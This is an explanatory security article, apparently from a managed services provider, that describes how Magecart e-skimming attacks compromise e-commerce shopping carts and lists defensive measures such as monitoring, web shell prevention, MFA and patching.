Cybercriminals use e-skimming techniques to exfiltrate data from website shopping carts.
The global e-commerce market has skyrocketed since the COVID-19 pandemic, and shows no sign of slowing down. Organizations in a wide range of industries have added an e-commerce component to their websites, facilitating customer payments for products, services, subscriptions and fees.
Typically, organizations use a “shopping cart” application that handles the collection and processing of online payments. This functionality is available from many third-party providers and easily plugged into an organization’s website. Problem is, shopping cart apps can become compromised, allowing hackers to steal payment data from unsuspecting organizations.
The Magecart Group 12 attack involved a PHP web shell disguised as a favicon (shortcut icon) that gave the hackers remote access to compromised servers. This allowed the attackers to dynamically load the e-skimming code from their command-and-control servers and evade most security tools.
A Look Inside a Magecart Attack
Magecart first became active in 2015 and has primarily targeted Magento. A September 2020 zero-day attack targeting Magento 1 affected thousands of e-commerce sites. However, security researchers have found at least one polymorphic e-skimmer that is capable of exfiltrating data from 57 different shopping cart platforms.
Attackers may break into an organization’s website to insert the code or infect a third-party tag that causes the malware to run. An organization’s e-commerce site might incorporate code from dozens of different companies — which may in turn utilize code from other developers. Researchers at Instart found that 75 percent of the code executed by a given website comes from outside resources. A vulnerability in any one of these resources could lead to a data breach.
Magecart attacks have been distributed via GitHub, a hosting platform that allows software developers to share and manage source code. GitHub also provides distributed version control — when code is changed, it is mirrored across apps that use it. Although this helps ensure that all developers have the same code version, it creates security risks. Magecart code-injection exploits are constantly evolving, so scanning the code with security tools is not 100 percent effective.
How to Protect against Magecart Attacks
Organizations seldom have visibility into the third-party resources they use, and often don’t realize that malicious code has been injected into their site until a data breach occurs. However, there are steps organizations can take to prevent a Magecart attack. It is critical to monitor for remote servers attempting to gain access to their systems and block any that aren’t trusted.
Organizations should also implement controls to prevent the installation of web shell “backdoors,” such as those used in the Magecart Group 12 attack. This allows the attackers to have virtually unfettered access to execute commands and code, install malware and connect to their command-and-control servers. Strong perimeter security and network segmentation can help prevent attackers from entering the network and moving from system to system.
Of course, many attacks originate with user error and weak endpoint devices. Organizations should train users to spot phishing emails with malicious links and attachments. It’s also important to change default login credentials and use strong passwords that cannot be easily guessed. Multifactor authentication adds another layer of protection.
A qualified managed services provider can help organizations implement this kind of layered security approach, and ensure that all systems and applications are kept up-to-date and patched. Continuous monitoring of the IT environment can detect malicious activity and exploits that get past perimeter defenses.
The rising use of e-commerce has led to a corresponding uptick in Magecart attacks. Organizations should take steps to secure their e-commerce sites and shopping cart apps to reduce the risk of a costly data breach.